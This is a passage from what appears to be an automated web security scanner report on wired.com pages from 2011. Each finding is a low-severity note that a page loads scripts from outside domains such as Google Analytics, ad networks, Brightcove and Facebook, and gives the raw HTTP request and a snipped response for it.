Path:   /about/faq/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/faq/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:34 GMT
Date: Wed, 12 Jan 2011 15:40:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.4. http://www.wired.com/about/feedback/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/feedback/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/feedback/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:59:39 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:25 GMT
Date: Wed, 12 Jan 2011 15:40:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.5. http://www.wired.com/about/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/mobile/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/mobile/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:28:16 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=457
Expires: Wed, 12 Jan 2011 15:48:06 GMT
Date: Wed, 12 Jan 2011 15:40:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.6. http://www.wired.com/about/press/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/press/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/press/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:49 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:48:03 GMT
Date: Wed, 12 Jan 2011 15:40:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.7. http://www.wired.com/about/privacy-policy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/privacy-policy/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/privacy-policy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:45:55 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=438
Expires: Wed, 12 Jan 2011 15:48:09 GMT
Date: Wed, 12 Jan 2011 15:40:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.8. http://www.wired.com/about/rss_feeds/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/rss_feeds/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/rss_feeds/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:23:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:22 GMT
Date: Wed, 12 Jan 2011 15:40:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.9. http://www.wired.com/about/sitemap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/sitemap/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/sitemap/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:38 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:34 GMT
Date: Wed, 12 Jan 2011 15:40:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.10. http://www.wired.com/about/staff_web/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/staff_web/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/staff_web/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:47 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:35 GMT
Date: Wed, 12 Jan 2011 15:40:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.11. http://www.wired.com/about/user-agreement/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/user-agreement/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/user-agreement/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:09:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:48:30 GMT
Date: Wed, 12 Jan 2011 15:40:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.12. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- close shell div -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.13. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 24466
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- close shell div -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.14. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- close shell div -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.15. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 24466
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- close shell div -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.16. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /atg/registry/RepositoryTargeters/WIR/WIR_global_navBar

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_global_navBar HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 24466
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- close shell div -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.17. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- close shell div -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.18. http://www.wired.com/autopia/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /autopia/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /autopia/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:33:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=383
Expires: Wed, 12 Jan 2011 15:44:57 GMT
Date: Wed, 12 Jan 2011 15:38:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<!-- CES 2011 Widescreen Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Autopia Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.19. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/autopia/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:16:06 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=474
Expires: Wed, 12 Jan 2011 15:46:36 GMT
Date: Wed, 12 Jan 2011 15:38:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
